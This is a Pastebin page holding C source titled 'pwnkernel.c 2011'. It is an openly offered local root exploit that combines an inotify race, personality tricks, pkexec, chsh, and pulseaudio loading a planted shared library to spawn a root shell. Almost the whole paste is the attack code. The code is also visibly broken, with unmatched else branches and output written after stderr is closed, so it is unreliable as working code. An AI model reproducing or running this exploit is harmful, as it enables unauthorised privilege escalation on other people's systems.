API tools faq
paste
Guest User

Untitled

a guest
Apr 11th, 2018
220
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Clone C++ 2.19 KB | None | 0 0
raw download clone embed print report
  1. /* pwnkernel.c 2011 */
  2. #include <stdio.h>
  3. #include <stdlib.h>
  4. #include <unistd.h>
  5. #include <fcntl.h>
  6. #include <sys/personality.h>
  7. #include <sys/stat.h>
  8. #include <sys/types.h>
  9. #include <sys/inotify.h>
  10.  
  11. #define PU_PATH "/usr/bin/pulseaudio"
  12. #define PK_PATH "/usr/bin/pkexec"
  13.  
  14. #define PATH_TO_EXPLOIT "/home/teste/exploit.so"
  15.  
  16. int main(int argc, int **argv) {
  17.         int ret,fd;
  18.         char pid_path[1024];
  19.         struct stat fstat;
  20.         ret = personality(PER_SVR4);
  21.         if (ret == -1) {
  22.         fprintf(stderr, "[-] Unable to set personality!\n");
  23.         return 0;
  24.         }
  25.         fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
  26.         if (stat(PU_PATH, &fstat)) {
  27.        fprintf(stderr, "[-] PulseAudio doesnt exist!\n");
  28.         return 0;
  29.         }
  30.         fprintf(stdout, " [+] Personality set to: PER_SVR4 ..\n");
  31.         if (stat(PK_PATH, &fstat)) {
  32.        fprintf(stderr, "[-] PolicyKit (2010) doesnt exist!\n");
  33.         return 0;
  34.         }
  35.         fprintf(stderr, "[+] Gettin our PID for policykit exploiting ..\n");
  36.         sprintf(pid_path, "/proc/%i", getpid()); // could maybe do like /proc/self/exe ,or other trix ;>
  37.         close(0);
  38.         close(1);
  39.         close(2);
  40.         fd = inotify_init();
  41.         inotify_add_watch(fd, pid_path, IN_ACCESS);
  42.         fprintf(stderr, "[+] Inotify watching ..\n");
  43.         read(fd, NULL, 0);
  44.         fprintf(stderr, "[!] Lets try exploit this race! chsh() first ..\n");
  45.         execl("/usr/bin/chsh", "chsh", NULL);
  46.         fprintf(stderr, "[+] Success! Now the MAIN pxexec() binary ..\n");
  47.         execl(PK_PATH, "pkexec", "/bin/sh", NULL);
  48.         fprintf(stderr, "[*] Got root using pkexec() local!\n");
  49.         } else {
  50.         sleep(2);
  51.         }
  52.         if (!(fstat.st_mode & S_ISUID) || fstat.st_uid != 0) {
  53.        fprintf(stderr, "[-] Pulseaudio/PolicyKit-2010 is not suid root!\n");
  54.         return 0;
  55.         }
  56.         fprintf(stderr, "[=] Failsafer running,try revive this exploit ..\n");
  57.         execl(PU_PATH, PU_PATH, "--log-level=0", "-L", PATH_TO_EXPLOIT, NULL);
  58.         } else {
  59.         execl(PK_PATH, "pkexec", "/bin/su", "-c", "/bin/sh", PATH_TO_EXPLOIT, NULL);
  60.         fprintf(stderr, "[*] Success ..\n");
  61.         }
  62.         return 0;
  63. }
  64. // E0F 2011
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!